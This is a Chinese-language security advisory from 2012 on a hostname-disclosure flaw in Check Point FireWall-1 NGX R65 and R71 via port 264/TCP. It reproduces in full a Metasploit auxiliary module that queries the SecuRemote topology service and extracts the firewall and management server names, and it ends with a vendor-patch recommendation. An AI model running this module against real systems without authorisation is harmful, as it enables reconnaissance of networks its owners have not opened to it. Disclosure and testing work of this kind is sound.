发布日期:2012-03-12 更新日期:2012-03-14受影响系统: Check Point Software FireWall-1 NGX R71 Check Point Software FireWall-1 NGX R65 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 52430Check Point软件技术有限公司成立时间于 1993 年,美国总部在加利福尼亚州红木城,是全球首屈一指的 Internet 安全解决方案供应商,在全球企业防火墙、个人防火墙及虚拟专用网络(VPN )市场上居于领导地位。Check Point多款端点安全产品在实现上存在信息泄露漏洞,通过发送某些查询到CheckPoint Firewall-1上的端口264/TCP,会显示主机名。攻击者可利用此漏洞获取敏感信息。 <*来源:Patrick Webster (pwebster@ausgeo.com.au) http://www.linuxidc.com/Linux/2012-03/56700.htm *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Patrick Webster (pwebster@ausgeo.com.au)提供了如下测试方法:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ##require "msf/core"class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, "Name" => "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure", "Description" => %q{ This module sends a query to the port 264/TCP on CheckPoint Firewall-1 firewalls to obtain the firewall name and management station (such as SmartCenter) name via a pre-authentication topology request. Note that the SecuriTeam reference listed here is not the same vulnerabilty, but it does discus the same protocol and is somewhat related to this information disclosure. }, "Author" => [ "patrick" ], "DisclosureDate" => "Dec 14 2011", # Looks like this module is first real reference "References" => [ # patrickw - None? Stumbled across, probably an old bug/feature but unsure. [ "URL", "http://www.osisecurity.com.au/advisories/" ], # Advisory coming soon, placeholder [ "URL", "http://www.securiteam.com/securitynews/5HP0D2A4UC.html" ] # Related-ish ] )) register_options( [ Opt::RPORT(264), ], self.class) end def autofilter false end def run print_status("Attempting to contact Checkpoint FW1 SecuRemote Topology service...") fw_hostname = nil sc_hostname = nil connect sock.put("x51x00x00x00") sock.put("x00x00x00x21") res = sock.get_once(4) if (res == "Yx00x00x00") print_good("Appears to be a CheckPoint Firewall...") sock.put("x00x00x00x0bsecuremotex00") res = sock.get_once if (res =~ /CN=(.+),O=(.+)./i) fw_hostname = $1 sc_hostname = $2 print_good("Firewall Host: #{fw_hostname}") print_good("SmartCenter Host: #{sc_hostname}") end else print_error("Unexpected response: "#{res.inspect}"") end report_info(fw_hostname,sc_hostname) disconnect end # Only trust that it"s real if we have a hostname. If you get a funny # response, it might not be what we think it is. def report_info(fw_hostname,sc_hostname) return unless fw_hostname host_info = { :host => datastore["RHOST"], :os_name => "Checkpoint Firewall-1", :purpose => "firewall" } host_info[:name] = fw_hostname host_info[:info] = "SmartCenter Host: #{sc_hostname}" if sc_hostname report_host(host_info) svc_info = { :host => datastore["RHOST"], :port => datastore["RPORT"], :proto => "tcp", :name => "securemote" } report_service(svc_info) endend建议: -------------------------------------------------------------------------------- 厂商补丁:Check Point Software -------------------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.checkpoint.comlibpng "png_inflate()"堆缓冲区溢出漏洞Cisco ASA威胁检测拒绝服务漏洞相关资讯 Check Point 本文评论 查看全部评论 (0)
易网时代-编程资源站